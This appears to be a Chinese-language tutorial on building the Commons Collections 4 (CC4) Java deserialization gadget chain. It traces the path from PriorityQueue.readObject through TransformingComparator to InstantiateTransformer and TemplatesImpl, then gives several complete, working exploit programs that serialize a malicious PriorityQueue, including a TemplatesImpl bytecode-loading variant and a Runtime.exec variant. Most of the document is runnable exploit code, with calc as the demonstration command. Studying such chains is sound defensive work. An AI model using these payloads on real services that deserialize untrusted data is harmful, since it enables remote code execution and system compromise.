环境

不受JDK版本限制，这里还是用8u65

JDK8u65
openJDK 8u65
Maven 3.6.3
Commons-Collections 4.0

Maven下载Commons-Collections依赖

<dependency>  
 <groupId>org.apache.commons</groupId>  
 <artifactId>commons-collections4</artifactId>  
 <version>4.0</version>  
</dependency>

CC4

分析

因为还是CC链的漏洞，所以离不开transform方法。

前面我们已经分析过了CC1、CC6和CC3，链子尾部命令执行的方法就两种，Runtime.exec或者动态加载字节码。

CC4去掉了InvokerTransformer的Serializable继承，但是命令执行不受影响。

我们需要再找一个类调用transform方法，这里找的是InstantiateTransformer类，然后继续find usages

TransformingComparator类

compare方法调用了transform方法，继续找谁调用了compare方法

java.util.PriorityQueue类的siftDownUsingComparator方法调用了compare方法

然后是同一个类下的siftDown方法调用了siftDownUsingComparator方法

然后是heapify

然后是readObject

至此我们已经分析完了链子，下面开始写Exp

编写Exp

先编写一个InstantiateTransformer.tansform()的Exp，这里是通过动态加载字节码来命令执行

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class CC4Exp1 {
public static void main(String[] args) throws Exception{
    TemplatesImpl templates = new TemplatesImpl();
    Class templatesClass = templates.getClass();
    Field nameField = templatesClass.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templates,"p0l1st");

    Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
    bytecodesField.setAccessible(true);
    byte[] evil = Files.readAllBytes(Paths.get("E://Calc.class"));
    byte[][] codes = {evil};
    bytecodesField.set(templates,codes);

    Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
    tfactoryField.setAccessible(true);
    tfactoryField.set(templates, new TransformerFactoryImpl());
    //    templates.newTransformer();

    InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
            new Object[]{templates});

    instantiateTransformer.transform(TrAXFilter.class);
}
}

成功弹出计算器，继续往前到siftDownUsingComparator

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class CC4Exp2 {
public static void main(String[] args) throws Exception{
    TemplatesImpl templates = new TemplatesImpl();
    Class templatesClass = templates.getClass();
    Field nameField = templatesClass.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templates,"p0l1st");

    Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
    bytecodesField.setAccessible(true);
    byte[] evil = Files.readAllBytes(Paths.get("E://Calc.class"));
    byte[][] codes = {evil};
    bytecodesField.set(templates,codes);

    Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
    tfactoryField.setAccessible(true);
    tfactoryField.set(templates, new TransformerFactoryImpl());
    //    templates.newTransformer();
    InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
            new Object[]{templates});
    Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(TrAXFilter.class), // 构造 setValue 的可控参数
            instantiateTransformer
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    //  instantiateTransformer.transform(TrAXFilter.class);

    TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
    PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
    serialize(priorityQueue);
    unserialize("ser.bin");
}
        public static void serialize(Object obj) throws IOException {
            ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
            oos.writeObject(obj);
        }
        public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
            ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
            Object obj = ois.readObject();
            return obj;
        }
}

没弹计算器，但是也没报错

在PriorityQueue的第734行的heapify打个断点

直接跳出了，并没有进入siftDown

原因就是这里的size>>>1,>>>是移位符，移位符定义如下

value >>> num //value是进行右移的数字，num是指定的移位位数即value向右移动多少位

我们再看这个循环条件，i=(size >>>1) -1;i>=0，说明size至少要是2才能进入循环，size就是PriorityQueue这个队列的长度

给队列加两个元素

priorityQueue.add(1);  
priorityQueue.add(2);

exp

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class CC4Exp2 {
public static void main(String[] args) throws Exception{
    TemplatesImpl templates = new TemplatesImpl();
    Class templatesClass = templates.getClass();
    Field nameField = templatesClass.getDeclaredField("_name");
    nameField.setAccessible(true);
    nameField.set(templates,"p0l1st");

    Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
    bytecodesField.setAccessible(true);
    byte[] evil = Files.readAllBytes(Paths.get("E://Calc.class"));
    byte[][] codes = {evil};
    bytecodesField.set(templates,codes);

    Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
    tfactoryField.setAccessible(true);
    tfactoryField.set(templates, new TransformerFactoryImpl());
    //    templates.newTransformer();
    InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
            new Object[]{templates});
    Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(TrAXFilter.class), // 构造 setValue 的可控参数
            instantiateTransformer
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    //  instantiateTransformer.transform(TrAXFilter.class);

    TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
    PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
    priorityQueue.add(1);
    priorityQueue.add(2);
    serialize(priorityQueue);
    unserialize("ser.bin");
}
        public static void serialize(Object obj) throws IOException {
            ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
            oos.writeObject(obj);
        }
        public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
            ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
            Object obj = ois.readObject();
            return obj;
        }
}

虽然成功弹出了计算器，但是有报错

这是因为执行priorityQueue.add(1)这个语句的时候，它内部会自动进行compare方法的执行，然后调用transform

这就意味着，没有开始序列化和反序列化，就可以弹计算器了

我们可以用CC6的方式，给transformingComparator设置成一个无关的对象，add之后再通过反射修改回来

最终Exp

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class CC4ExpTem {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class templatesClass = templates.getClass();
        Field nameField = templatesClass.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"p0l1st");

        Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] evil = Files.readAllBytes(Paths.get("E://Calc.class"));
        byte[][] codes = {evil};
        bytecodesField.set(templates,codes);

        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates, new TransformerFactoryImpl());
        //    templates.newTransformer();
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
                new Object[]{templates});
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class), // 构造 setValue 的可控参数
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        //  instantiateTransformer.transform(TrAXFilter.class);

//    TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);

        Class c = transformingComparator.getClass();
        Field transformingField = c.getDeclaredField("transformer");
        transformingField.setAccessible(true);
        transformingField.set(transformingComparator, chainedTransformer);

        serialize(priorityQueue);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

Exp

动态加载字节码

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class CC4ExpTem {
    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class templatesClass = templates.getClass();
        Field nameField = templatesClass.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates,"p0l1st");

        Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] evil = Files.readAllBytes(Paths.get("E://Calc.class"));
        byte[][] codes = {evil};
        bytecodesField.set(templates,codes);

        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
        tfactoryField.setAccessible(true);
        tfactoryField.set(templates, new TransformerFactoryImpl());
        //    templates.newTransformer();
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
                new Object[]{templates});
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class), // 构造 setValue 的可控参数
                instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        //  instantiateTransformer.transform(TrAXFilter.class);

//    TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);

        Class c = transformingComparator.getClass();
        Field transformingField = c.getDeclaredField("transformer");
        transformingField.setAccessible(true);
        transformingField.set(transformingComparator, chainedTransformer);

        serialize(priorityQueue);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}

Runtime

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class CC4ExpRun {
    public static void main(String[] args) throws Exception{

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
        //        TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
        priorityQueue.add(1);
        priorityQueue.add(2);

        Class c = transformingComparator.getClass();
        Field transformingField = c.getDeclaredField("transformer");
        transformingField.setAccessible(true);
        transformingField.set(transformingComparator, chainedTransformer);
        serialize(priorityQueue);
        unserialize("ser.bin");
    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}